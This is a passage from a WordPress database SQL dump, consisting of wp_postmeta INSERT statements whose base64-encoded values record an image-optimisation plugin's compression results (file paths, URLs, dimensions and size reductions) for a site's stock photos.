dGlvbiI6MSwidGltZSI6MTQ4MzU4OTg1MiwiaWQiOjE0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg1NCwiaWQiOjE0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg1NywiaWQiOjE0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg1OSwiaWQiOjE0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzcwNDM0OC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg2MSwiaWQiOjE0MX1d'); 
INSERT INTO `wp_postmeta` VALUES (30339, 140, 'wpfc_optimisation_reduction', '47123'); 
INSERT INTO `wp_postmeta` VALUES (30340, 140, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAuanBnIiwicmVkdWN0aW9uIjo0NzEwOSwidGltZSI6MTQ4MzU4OTg3MSwiaWQiOiIxNDAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg3MywiaWQiOjE0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk4NzYsImlkIjoxNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5ODc5LCJpZCI6MTQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xNjAweDEwNjYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtMTYwMHgxMDY2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xNjAweDEwNjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5ODgzLCJpZCI6MTQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg4NSwiaWQiOjE0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTc1NjEzMTAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk4ODcsImlkIjoxNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE3NTYxMzEwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5ODkwLCJpZCI6MTQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg5MiwiaWQiOjE0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg5NSwiaWQiOjE0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTg5NywiaWQiOjE0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkwMCwiaWQiOjE0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkwMiwiaWQiOjE0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkwNSwiaWQiOjE0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNzU2MTMxMC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkwOCwiaWQiOjE0MH1d'); 
INSERT INTO `wp_postmeta` VALUES (30341, 139, 'wpfc_optimisation_reduction', '18266'); 
INSERT INTO `wp_postmeta` VALUES (30342, 139, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjExOTQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMuanBnIiwicmVkdWN0aW9uIjoxODI1MiwidGltZSI6MTQ4MzU4OTkxNiwiaWQiOiIxMzkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkxOSwiaWQiOjEzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMtODAweDU5Ny5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU5NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMtODAweDU5Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMtODAweDU5Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk5MjEsImlkIjoxMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLTc2OHg1NzMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLTc2OHg1NzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE2MTY2MTgzLTc2OHg1NzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5OTI0LCJpZCI6MTM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xNjAweDExOTQuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTE5NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMtMTYwMHgxMTk0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0xNjAweDExOTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5OTI3LCJpZCI6MTM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNjE2NjE4My0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTkyOSwiaWQiOjEzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTYxNjYxODMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG